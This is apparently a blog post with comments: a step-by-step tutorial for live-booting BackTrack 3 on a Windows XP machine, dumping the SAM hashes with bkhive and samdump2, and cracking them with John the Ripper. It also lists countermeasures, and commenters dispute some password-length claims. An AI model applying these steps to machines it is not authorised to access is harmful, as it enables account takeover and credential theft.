Cracking job become easy when Backtrack Linux distro come in place, and it get easier when you want crack password saved in WinXP.
Windows XP stored it username and password information in file named SAM at %SystemDrive%:\Windows\system32\config\. The SAM file is encrypted using LM hashes, which is vulnerable to rainbow table attack and bruteforce attack.
Insert the Backtrack3 CD/USB, make it a live boot up.
When you get into Backtrack 3 Desktop
On the console, type
df *to view the harddisk partition distribution on, you may find your Windows system stored at partition /mnt/hda1 (usually, as used for example here)
cd /mnt/hda1/WINDOWS/system32/config/
bkhive system key *bkhive manual
samdump2 SAM key > ~/Desktop/password.txt *~/Desktop/password.txt is the example location for storing dumped password harsh file
cat ~/Desktop/password.txt
You will see the usersname and the hash values of the SAM file.
There are multiple way to crack the hash (johntheripper, rainbow table, LCP). Over here, we use john the ripper as example.
john ~/Desktop/password.txt –users=Administrator (Administrator is the example user name)
The user Owner has the password “abc123” and the Administrator has no password.
Countermeasure for the attack:
- Set boot-up password on BIOS to prevent unauthorized live boot up using CD/USB storage media.
- Secure physical access to the machine. The cardinal rule that physical access equals total access exists for a reason.
- Use strong passwords. Strong password means combination of alphanumeric(01245…vwxyz) and symbols (!@#$%^&*()_+), at least 8 characters in length, will take much longer time (sometimes may be impossible to crack, like password “%a^&b*&e^$5*45*&^%<%” for medium-size rainbow table) to do its job.
Reference and credits to:
I couldn’t help but notice the example picture and the username said …..that wouldn’t happen to be one of the university of iowa’s computers now would it? hahaha
If the computer is a member of Active Directory, then this matter won’t work!
For prevention, please refer to the suggestion above…
Say an example, if you don’t implement a harddisk encryption solution, the BIOS is anyone-configurable to boot Live OS, and all pc are standalone workstation, it will works!
This is a good article and the countermeasures are good advice, but the article fails to mention one thing. By using a 15 character or longer password, the hashes are not stored as vulnerable hashes. If you use a fifteen character or longer password, it doesn’t matter what charset you use ([a-z] should be sufficient), it will take forever to crack.
Thanks for your comment Tom.
I think with the help of Rainbow Table, the NTLM hash of 15 character or more password is still vulnerable, depending on the password coverage range of the table. Please prove me wrong. Thanks!
Old topic I know.
But I have to correct Tom. Hashes are cracked just by brute force. A 15+ char password means nothing with a weak char set. Just FYI
Typo in my previous comment “are” should be “aren’t”